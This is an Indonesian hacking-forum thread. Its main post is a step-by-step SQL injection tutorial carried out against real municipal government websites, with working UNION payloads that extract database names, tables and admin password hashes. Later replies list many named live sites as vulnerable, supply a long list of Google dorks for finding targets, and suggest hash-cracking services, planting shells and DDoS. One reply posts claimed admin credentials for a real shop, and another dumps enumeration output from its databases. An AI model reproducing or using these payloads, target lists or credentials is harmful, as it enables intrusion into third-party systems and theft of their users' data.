Page 1 of 3 123 LastLast
Results 1 to 15 of 38
http://idgs.in/195274
  1. #1

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default [dark tutorial] exploitasi site dgn SQLi

    dlu ada yg pernah request tutorial jebol2 site, sapa ya? ;p nah ni ane kasih dkit penjelasannya.. gw ambil dr tutor tmn ane di JS brotha p1t4qh ^ ^, tpi gw edit dkit targetnya, webnya jgn diacak2 ya klo dah pada bisa..yg ngacak2 gw acak2 lagi komp lu tar.. di siteny dah gw tanem logger klo da yg berani deface2.. ok kita langsung praktekin :

    target kita adalah web yg memang memiliki vulnerability(baca:celah keamanan) yaitu SQL inject, SQL-i juga ada 2 metoda ada SQL-i biasa ada yg blind SQL-i..vulner di web juga ga hanya SQL-i aja, tapi ada macem2,antara lain : LFI(Local File Inclusion), RFI(Remote File Inclusion), RCE(Remote Command Execuiton), sama XSS (Cross Site Script) bukan CSSjadinya ya..klo ntu ma buat style2 html

    SQL(Structured Query Language): cari di mbah google aja ya klo masih bngung itu apaan..

    ok sblum gw masuk ke langkah2 SQL-i ada beberapa yg perlu diperhatikan dr seorang hacker2 lamers yg kerjanya deface2, mereka bukan mencari target tapi mencari vulner.. coba si hacker yg sering deface2 itu gw sruh jebol situs FBI, gw jamin dia geleng2 karna dia cm tau vulner tertentu, udah pasti site2 FBI keq gtu mana ada vulner SQL-injectnya, karena ini vulner dan teknik lama. meskipun teknik jadul tp hacker2 harus tau teknik ini..
    kalau tadi saya suruh si hacker jebol sebuah site sekarang saya suruh dia jebol site apapun sebanyak mungkin..dan pastinya dia bisa lakuin bermodal vulner yg dia tau tadi(misal SQL-i), jadi sebenarnya ada perbedaan antara hacker lamers yg tidak beretika dan hacker proffesional yg sangat beretika, semakin menakutkan seorang hacker dilihat dari kemampuan ia mengenal vulner dan memanfaatkannya ^ ^

    ok kita bahas vulner legendaris yg satu ini

    Berikut ini akan disajikan langkah demi langkah SQL Injection yang diimplementasikan pada web http://www.bandung.go.id. nah loh...website pemerintah kota bandung booo...disini ternyata ada vulner SQL-i nyaTutorial ini hanya untuk pembelajaran dan pengetahuan (just to share) dan untuk para master yang telah berpengalaman dianjurkan memberikan masukan agar tekniknya menjadi lebih menarik. :mrgreen:

    kunci dari exploitasi ini adalah kesabaran

    Langkah-langkahnya sebagai berikut :
    1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan mengujinya dengan operator logika ( AND ).
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=9'
    Hasil Uji :
    -Halaman akan menampilkan pesan error
    Code:
    Fatal error: Call to a member function RecordCount() on a non-object in /data1/web/public_html/site/download/qry_download_cat.php on line 6
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=1
    http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=6
    Hasil Uji :
    -Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara normal.
    -Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan (tidak berjalan normal), disini pagenya jadi kosong.

    2. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakukan penambahan/increment pada variabel num. Parameternya adalah jika field masih tersedia maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai pada angka 4.
    Code:
    http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+order+by+4--
    Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-set komentar terhadap sintaks setelah klausa WHERE. Kebetulan pada contoh kasus kali ini, setelah klausa WHERE terdapat perintah sql yg lain entah itu ORDER atau LIMIT. Untuk itu digunakan parameter komentar agar perintah sql tersebut tidak dijalankan sehingga kita mendapatkan pesan error jika field yang di ORDER tidak tersedia.

    Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukan ORDER BY 1 dan ORDER BY 100 halaman akan tetap menampilkan pesan error. Kalau kejadiannya seperti ini dari mana kita bisa mengetahui jumlah field yang di-select??

    3. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang digunakan adalah UNION+ALL+SELECT+no_field+no_field+....
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,2,3,4--
    Pada contoh kali ini, variabel id kita beri nilai null agar angka-angka yang kita deklarasikan keluar, atau bisa juga menggunakan tanda minus (id=-870). Dari angka-angka yang tercetak pada halaman web, kita akan mengeluarkan informasi dari versi mysql, nama database dan nama user.
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x2B,version(),database(),user()),3,4--
    4. Selanjutnya kita akan mengeluarkan nama-nama tabel dengan perintah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TA BLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_SCHEMA=DATABASE(). Gunakan klausa WHERE TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari database yang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa WHERE tidak perlu Anda gunakan.(catatan=INFORMATION_SCHEMA hanya untuk SQL ver 5 keatas, utk ver 4 query ini tidak akan bisa digunakan
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
    Pada perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) dengan angka 2, jika Anda tidak ingin menampilkan informasi tentang versi mysql, nama database, dan nama user.

    5. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna. Pada website ini nama tabel yang dimaksud adalah tuser. Sintaks dasarnya adalah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO LUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='NAMA_TABLE'. Jika terjadi error maka kita harus meng-konversi nama tabel ke bentuk hexadecimal_sql sehingga menjadi 0x7475736572
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x7475736572--
    6. Langkah terakhir kita akan mengeluarkan record-record dari tabel tuser. struktur perintahnya adalahUNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE. Kalau dijalankan pada contoh kasus kali ini menjadi :
    Code:
    http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x3a,userid,pwd),3,4+from+tuser--
    nahh.. keliatan kan username admin ama hash passwordnya.. sisanya tinggal ***** tu hash(decrypt), jenisnya harus tau dlu apakah md4,md5,sha1,dll. kadangkala ada pula yg ga dienkrip,ini fatal banget klo sampe ga dienkrip.

    kalo udah dapet passwd trus ngapain?,ya tgl cari page admin nya..login trus terserah deh mau diapain,. dah jadi super admin ini^^ sory ga gw kasih tau pagenya dmn..just learning

    Sampai disini selesai sudah penyajian penulis mengenai langkah demi langkah SQL Injection pada Web pemerintah kota bandung. saya tidak bertanggung jawab atas segala dampak negatif akibat penyalahgunaan artikel ini.. dan khusus web yg saya ambil sebagai sampel jgn pernah sekali2 coba deface, Mohon dikoreksi jika terdapat kekurangan ataupun kesalahan.

    author1t4qh - jasakom mentor & write and edited by: bl00d13z a.k.a b1n4ry_g33k5/c0mrade - jasakom advisor
    Last edited by bl00d13z; 09-05-09 at 15:26.

  2. Hot Ad
  3. #2
    koker123's Avatar
    Join Date
    Jan 2007
    Location
    Somewhere on Earth
    Posts
    838
    Points
    993.90
    Thanks: 1 / 2 / 2

    Default

    ea serem dah d pasangin logger

    anak jasakom
    wakakakakakakak

  4. #3

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by koker123 View Post
    ea serem dah d pasangin logger

    anak jasakom
    wakakakakakakak
    iya lah..mana tega gw web bangsa ndri diacak2..kecuali klo adminnya nantang..sbnernya ada cara cpetnya buat SQL-i otomatis..tar sy kasih tutorny klo emg pada mau,, berhubung toolsny source code itu jg tar bisa jadi pelajaran sekalian programming..ga sampe 2 mnt web yg vulner sql-i ini udah dpt username ma passwd adminnya..ane mo mandi dlu..hueheu

  5. #4
    Kurt.D.Cobain's Avatar
    Join Date
    Apr 2008
    Location
    =
    Posts
    1,974
    Points
    4,012.20
    Thanks: 0 / 20 / 17

    Default

    @bl00d13z
    gile,keren,...anyway si bro bahaya juga ya ilmunya.... senggol dikit langsung bacok nih.. ahahahahah
    For Fun
    www.R-L.me

  6. #5

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by Kurt.D.Cobain View Post
    @bl00d13z
    gile,keren,...anyway si bro bahaya juga ya ilmunya.... senggol dikit langsung bacok nih.. ahahahahah
    bused bacok >.< .. anyway nih gw kasih site2 yg bisa buat belajar SQL-i

    http://www.cnet.org.uk/news1.php?ID=...@version,3,4--
    http://www.corporatedevelopmint.com/... 11,12,13,14--
    http://www.michaelpollan.com/article...5,6,7,8,9,10--
    http://www.virtuosimedia.com/resourc...@version,3,4--
    http://www.lavocedellevoci.it/news1....,@@version,6--
    http://www.lavocedellevoci.it/grandi...@version,4,5--
    http://www.allfungames.com/games.php...,10,11,12,13--
    http://www.purdes.com/blog/art.php?i...,3,4,5,6,7,8--
    http://himti.org/news_detail.php?new...a=database()--

    itu sekitar 1bulan lalu gw cari2nya.. skrg ga tau uh di patch pa blom, tes2 aj.. ato gunain dork umum wat SQLi ini di google :

    Code:
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:pop.php?id=
    inurl:shopping.php?id=
    inurl:productdetail.php?id=
    inurl:post.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurl:page.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurl:product_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:transcript.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:pages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurl:opinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurl:offer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:trainers.php?id=
    Last edited by bl00d13z; 09-05-09 at 21:12.

  7. #6
    koker123's Avatar
    Join Date
    Jan 2007
    Location
    Somewhere on Earth
    Posts
    838
    Points
    993.90
    Thanks: 1 / 2 / 2

    Default

    banyak juga ya web yg bisa d pake buat latihan lol

    btw itu adminnya web bandung tau gak webnya d pake buat ginian
    ntar gw nyoba d web itu (padahal cuman mau belajar doang)
    eh d isengin lagi ama adminnya
    kan berabe ane >.<

    nih subforum makin lama makin sadis aja
    wkwkwkwkwk
    Last edited by koker123; 09-05-09 at 17:24.

  8. #7

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by koker123 View Post
    banyak juga ya web yg bisa d pake buat latihan lol

    btw itu adminnya web bandung tau gak webnya d pake buat ginian
    ntar gw nyoba d web itu (padahal cuman mau belajar doang)
    eh d isengin lagi ama adminnya
    kan berabe ane >.<
    hihi adminya si tau webnya vulner, tp kaga dbner2in..cm gw liat passny ganti2 deh keqnny+strong passwd,jd ngcracknya berat..saran gw sih web2 yg gw kasih aj, ato cb belajar cari sndri gunain dork google yg gw kasih.. tar klo mau ***** hash md5(32bit) ke sini aja http://md5cracker.org/ multi cracking dia, hashny di link ke site2 cracker lainny, tar klo hash ny ada yg cocok di db masing2 site bakal dikasih lgsg passwdny(biasanya passwd2 yg weak), klo ud coba di ***** disitu ga bisa, baru pake sopware ***** sendiri..punya cain n abel kan? disitu bisa, atau klo mau yg ringan n simpel tar gw kasih source codeny, bkin di perl, tp khusus wat md5 aj, met belajar deh ya..klo bngung discuss lg ja dsni,. sbnernya maen2 gnian keq maenan game loh..hehe, cari2 modul web yg bisa diinject..klo dah dpt didokumentasiin,,klo dah pro biasanya malah dijaga itu server,tanem shell buat tar akses lwt backdoor, kalo udh maenan shell itu server udh bs diambil alih n dijadiin budak..suatu saat klo km benci ma sebuah site bisa panggil budak2 km buat down in tu server, maenan dDoS ujg2ny:
    anggep site A bandwidthnya 500mbps, gw punya budak server 10 bji masing-masing bandwidthny 100mbps, klo gw sruh si budak download halaman utama page site A berulang-ulang(looping) apa yg terjadi? resource bandwidth si site A habis buat layanin budak2 gw..nahh ga bisa diakses deh jadinya selama gw ga brentiin loopingnya.. wah ngeri ya >.<

  9. #8

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    nih ane tambah lagi site path yg vulner..barusan habis jajal,.tgl lanjutin ama query2 sqlnya..^ ^selamat bermain..

    http://www.spoono.com/php/tutorials/...al.php?id=2309
    http://www.export-japan.com/search/?...ct.php%3Fid%3D'
    http://www.plus2net.com/php_tutorial...g_dtl.php?id=5
    http://www.karat.org/index.php?pageId=358
    http://www.aecl.org/index.asp?pageid=379
    http://www.caot.ca/CAOT_career_listings.asp?pageid=1001
    http://www.bettertextures.com/preview.php?id=90
    http://www.allianceprojectservices.c...review.php?id=
    http://www.visiontechdigital.com/np/preview.php?id=
    http://www.fanfooty.com.au/game/preview.php?id=3248
    http://www.readyicons.com/iconset-preview.php?id=8
    http://www.myspacelayouts.us/preview.php?id=106
    http://www.ultimatemyspace.com/preview.php?id=
    http://www.operationsports.com/preview.php?id=63
    http://www.edenslostandfound.org/hom...iew.php?id=225
    http://www.columbiachronicle.com/pap...ns.php?id=1612
    http://www.creditdeals.com/support/opinions.php?id=192
    http://www.toorista.com/opinions.php?lang=fr&debut=100
    http://www.wetcnu.com/opinions.php?n...atest&start=12
    http://www.cityofpoughkeepsie.com/download.php?id=68
    http://www.907th.com/download.php?id=1
    http://www.dod-federation.com/download.php?id=5
    http://www.shareapple.com/download.php?id=40166
    http://www.chrisroyce.co.uk/album/viewPhoto.php?id=445
    http://www.andygrace.com/viewphoto.php?id=41
    http://picawin.com/viewphoto.php?id=2
    http://www.raypang.com/new/cryfield/viewphoto.php?id=7
    http://www.croyce.co.uk/album/viewPhoto.php?id=420
    http://www.phpbuddy.com/article.php?id=8 <---- PARAH, masa site berbau php punya vulner SQLi... =_=a
    http://www.democracyjournal.org/article.php?ID=6570
    http://www.nma-fallout.com/article.php?id=35862
    Last edited by bl00d13z; 09-05-09 at 22:39. Reason: update2 list site yg vulner SQLi

  10. #9
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    wah... forum game ene... bkn forum security...
    kwakwakwkawaw

    parah2 asle....
    ampun suhu...


    tp share dikit... SQLi fav gw... hehhe... prnah gw kirim bwat sms dia =p


    union all select 1,2,group_concat(hatinya,rasanya,inginya),4,5,6,7 from dia--
    andai km msh vulner dgn ku... tdk dengan nya... >.<"




    hiks2.. jd sedih kl inget lagi...




    whoooppppsss OOT!!!!

  11. #10

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by nveuu View Post
    wah... forum game ene... bkn forum security...
    kwakwakwkawaw

    parah2 asle....
    ampun suhu...


    tp share dikit... SQLi fav gw... hehhe... prnah gw kirim bwat sms dia =p


    union all select 1,2,group_concat(hatinya,rasanya,inginya),4,5,6,7 from dia--
    andai km msh vulner dgn ku... tdk dengan nya... >.<"




    hiks2.. jd sedih kl inget lagi...




    whoooppppsss OOT!!!!

    awkawkkwakwakwa kan IT IT juga.. buahahahah cacad itu query ck,ck,ck..parah2.. ngakak gw
    Last edited by bl00d13z; 09-05-09 at 22:24.

  12. #11
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    jadiin siggy aghhh... ....



    umm... suhu,,, asking... kalo kyk gini piye???
    http://www.grenadegloves.com

    http://www.grenadegloves.com/admin/

    gmn itu y... ud dapet iki passw e( id : joelumbruso... passw : test ).... u d *****.... e alah... nte bs jua gw....
    tp emang rada bingung aink....
    login admin nya kok rada beda ya.... kyk pake JS gt....
    nte ngertos...

    jelasin suhu...
    GRP2 ..

  13. #12

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by nveuu View Post
    jadiin siggy aghhh... ....



    umm... suhu,,, asking... kalo kyk gini piye???
    http://www.grenadegloves.com

    http://www.grenadegloves.com/admin/

    gmn itu y... ud dapet iki passw e( id : joelumbruso... passw : test ).... u d *****.... e alah... nte bs jua gw....
    tp emang rada bingung aink....
    login admin nya kok rada beda ya.... kyk pake JS gt....
    nte ngertos...

    jelasin suhu...
    GRP2 ..
    coba cari2 di db yg lainnya bro..ane lom coba dump.ada 5 db kan dsitu, klo dr db aslinya emg ngaco passwdnya.
    dbnya kan ini:
    Code:
    [+] Gathering MySQL Server Configuration...
    	Database: grenade
    	User: grenade@localhost
    	Version: 5.0.32-Debian_7etch5-log
    [+] Showing all databases current user has access too!
    [+] Number of Databases: 5
    
    [1]grenade
    [2]horde
    [3]mysql
    [4]phpmyadmin_eEs1NuhktKch
    [5]psa
    tabel2 di db grenade:
    Code:
    [1]admin_groups: id,text
    [2]admin_pages: id,caption,link,extra,gid,display
    [3]army: name,rank,aid,dob,email,addy,location,riding,csz,city,state,zip,country,likes,dis,comments,legacy_id,date,display
    [4]army_missions: id,mid,mission,statement,date
    [5]army_temp: id,name,dob,email,addy,csz
    [6]blocked: blockedid,ip,polls
    [7]categories: id,name,description,image,parent,rank,status
    [8]comment_users: id,name,email,password,date,ip
    [9]comments: id,post,user,comment,ip,date,status
    [10]dealers: id,state,city,shop,phone,address,zip,country
    [11]dingo: id,headline,image,teaser,content,date,status
    [12]discounts: id,code,amount,percentage,blanket,items,cats
    [13]featured: id,title,text,inventory_id
    [14]grenadians: id,name,headline,bio,age,location,date,status
    [15]inv_additions: id,parent,name,header,price
    [16]inv_cat: id,inventory_id,category
    [17]inv_options: id,inventory_id,name
    [18]inventory: id,sku,product,image,description,manufacturer,price,retail,now,weight,extra_shipping,no_shipping,no_tax,variation,related,stock,status,featured,popularity,date_added
    [19]ip: ipid,title,ip,vote
    [20]mailing_list: id,email,date
    [21]mk_users: id,user,pass
    [22]news: id,headline,image,teaser,content,date,status
    [23]old_customers: login,lost_password_email,shipping_first_name,shipping_last_name,shipping_address,shipping_city,shipping_state,shipping_zip,shipping_country,shipping_email,shipping_phone,shipping_fax,shipping_company,billing_first_name,bill_last_name,billing_address,billing_city,billing_state,billing_zip,billing_country,billing_email,billing_phone,billing_fax,billing_company
    [24]options: optionid,pollid,options,images,votes,order_id
    [25]orders: id,user,session,status,shipping_type,shipping_additions,date,name,email,address,city,state,zip,country,phone,use_ship,billing_name,billing_address,billing_city,billing_state,billing_zip,billing_country,notes
    [26]permissions: name,permissions
    [27]polls: pollid,title,starts,expires,vote,voting,results,graph,resultsvotes,ip,cookies,subdate,status
    [28]product: id,name,cat,style,desc,features,tag
    [29]product_cats: id,name
    [30]product_flavs: id,product,image_1,image_2,iname
    [31]sessions: id,session,user_id,item,additions,options,quantity,amount,gift,date
    [32]shipping_rules: id,name,method,price_min,price_max,cost,percentage,parent,addition
    [33]tax_rules: id,state,tax,percentage,shipping
    [34]team: id,name,image,type
    [35]team_bios: id,who,question,answer
    [36]users: id
    di db psa: <dsni ni bnyk column2 yg bs jd petunjuk penting
    Code:
    [1]APSApplicationItems: id,license_type_id,pkg_id,shared,disabled
    [2]APSClientApplicationItems: id,client_id,app_item_id,instances_limit
    [3]APSLicenseTypes: id,application_name,application_versions,application_features,license_type_hash,description
    [4]APSLicenses: id,key_number,source,ka_url,expiration_date,update_date,license_type_id,personal
    [5]Cards: id,personalName,companyName,phone,fax,email,address,city,state,zip,country
    [6]ClientsTraffic: cl_id,date,http_in,http_out,ftp_in,ftp_out,smtp_in,smtp_out,pop3_imap_in,pop3_imap_out
    [7]Components: name,version
    [8]DashboardPreset: id,name,uri,type
    [9]DashboardPresetConfig: id,preset_id,ord,uri,parent_id,type,title,description,enabled
    [10]DatabaseServers: id,host,port,type,admin_login,admin_password,last_error,server_version
    [11]DomainServices: id,dom_id,type,status,parameters_id
    [12]DomainsTraffic: dom_id,date,http_in,http_out,ftp_in,ftp_out,smtp_in,smtp_out,pop3_imap_in,pop3_imap_out
    [13]IP_Addresses: id,ip_address,mask,iface,type,ssl_certificate_id,default_domain_id
    [14]Limits: id,limit_name,value
    [15]ListsParams: user_id,user_type,parentList_id,list_name,flags,sort,filter,page,page_size
    [16]Logos: id,name,fake,url
    [17]MailLists: id,dom_id,name,status
    [18]Modules: id,name,packname,display_name,version,release,description,icon
    [19]NewsArticles: id,class,data
    [20]Notes: id,text
    [21]Notifications: id,status,send2admin,send2client,send2dlu,send2email,email,subj,note_id
    [22]PMM: sessionId,param,val
    [23]PMMDefault: param,val
    [24]Parameters: id,parameter,value
    [25]Permissions: id,permission,value
    [26]Repository: rep_id,component_id
    [27]SBConfig: param_name,param_value
    [28]SBResellers: id,client_id,sb_client_login,sb_reseller_id
    [29]SBSites: id,virtualHost_id,sb_site_id,sb_siteowner_id,sb_siteowner_login
    [30]SSOBranding: http_request_domain,idp_url
    [31]SiteAppFiles: instance_id,prefix,file
    [32]SiteAppPackages: id,name,version,release,categories,description,access_level,integrated,package_type,params_id
    [33]SiteAppResources: app_id,type,res_id,res_param_1
    [34]SiteApps: id,app_release,dom_id,dom_type,install_prefix,htdocs_directory,capp_item_id,params_id,license_id
    [35]Skins: id,name,place
    [36]Templates: id,name,note_id
    [37]TmplData: tmpl_id,element,value
    [38]WebApps: id,name,status,domain_service_id
    [39]accounts: id,type,password
    [40]actions: id,name,descr,enabled
    [41]ai_vendor_sources: id,type,url,priority,enabled,auth_required,login,password
    [42]anon_ftp: id,dom_id,max_conn,bandwidth,incoming,incoming_readable,incoming_subdirs,status,quota,display_login,login_text
    [43]apscategories: id,category_name,parent_id
    [44]badmailfrom: id,domain
    [45]certificates: id,csr,pvt_key,cert,cert_file,ca_cert,ca_file,name
    [46]cl_param: cl_id,param,val
    [47]clients: id,cr_date,cname,pname,login,account_id,status,phone,fax,email,address,city,state,pcode,country,locale,limits_id,params_id,perm_id,pool_id,logo_id,tmpl_id,sapp_pool_id,guid
    [48]cp_access: id,type,netaddr,netmask
    [49]custom_buttons: id,sort_key,level,level_id,place,text,url,conhelp,options,file
    [50]data_bases: id,name,type,dom_id,db_server_id,default_user_id
    [51]db_users: id,login,account_id,db_id
    [52]disk_usage: dom_id,httpdocs,httpsdocs,subdomains,web_users,anonftp,logs,dbases,mailboxes,webapps,maillists,domaindumps,configs,chroot
    [53]dns_recs: id,dns_zone_id,type,displayHost,host,displayVal,val,opt,time_stamp
    [54]dns_recs_t: id,type,displayHost,host,displayVal,val,opt,time_stamp
    [55]dns_zone: id,name,displayName,status,email,type,ttl,ttl_unit,refresh,refresh_unit,retry,retry_unit,expire,expire_unit,minimum,minimum_unit
    [56]dom_level_usrs: dom_id,account_id,state,card_id,perm_id
    [57]dom_param: dom_id,param,val
    [58]domainaliases: id,dom_id,dns_zone_id,status,name,displayName,dns,mail,web,tomcat
    [59]domains: id,cr_date,name,displayName,dns_zone_id,status,htype,real_size,cl_id,cert_rep_id,limits_id,params_id,guid
    [60]event_handlers: id,action_id,priority,user,command
    [61]exp_event: id,source,event_type,event_time,obj_class,obj_id,host,user,flushed
    [62]forwarding: dom_id,ip_address_id,redirect
    [63]hosting: dom_id,sys_user_id,ip_address_id,real_traffic,fp,fp_ssl,fp_enable,fp_adm,fp_pass,ssi,php,php_safe_mode,cgi,perl,python,fastcgi,miva,coldfusion,asp,asp_dot_net,ssl,webstat,same_ssl,traffic_bandwidth,max_connection
    [64]itmpl: id,name
    [65]itmpl_data: itmpl_id,page,control,state,control_type
    [66]key_history: id,plesk_key_id,name,filename,register_date,update_disabled,options
    [67]key_history_params: key_id,param,val
    [68]locales: id,active
    [69]lockout: login,last_wrong,attempts
    [70]log_actions: id,date,ip_address,user,action_id,object_id
    [71]log_components: action_id,component,old_value,new_value
    [72]log_rotation: id,period_type,period,max_number_of_logfiles,compress_enable,email,turned_on
    [73]mail: id,mail_name,perm_id,postbox,account_id,redirect,redir_addr,mail_group,autoresponder,spamfilter,virusfilter,mbox_quota,dom_id
    [74]mail_aliases: id,mn_id,alias
    [75]mail_redir: id,mn_id,address
    [76]mail_resp: id,mn_id,resp_name,keystr,key_where,subject,reply_to,content_type,charset,text,resp_on,ans_freq,mem_limit
    [77]mass_mail: id,name,from_email,to_admin,to_clients,to_clients_mode,to_domains,to_domains_mode,subject,body,cdate
    [78]mass_mail_clients: mm_id,cl_id
    [79]mass_mail_domains: mm_id,dom_id
    [80]misc: param,val
    [81]mn_param: mn_id,param,val
    [82]password_secrets: secret,type,id,created
    [83]pd_users: id,login,account_id,pd_id
    [84]protected_dirs: id,non_ssl,ssl,cgi_bin,realm,path,dom_id
    [85]report: id,type,user_id,user_type,name,is_default
    [86]report_auto: id,report_id,auto,last,recipient,email,client,domain
    [87]report_section: id,report_id,name,type
    [88]resp_attach: id,rn_id,filename
    [89]resp_forward: id,rn_id,address
    [90]resp_freq: id,rn_id,email,num,time_resp
    [91]secret_keys: key_id,ip_address,description
    [92]sessions: sess_id,type,login,ip_address,login_time,click_time
    [93]siteapppackages_apscategories: siteapppackage_id,apscategory_id,order
    [94]slave_params: slave_id,parameter,value
    [95]slaves: id,hostname
    [96]smtp_poplocks: ip_address,ip_mask,lock_time
    [97]spamfilter: id,username,preferences,reject_spam
    [98]spamfilter_preferences: prefid,spamfilter_id,preference,value
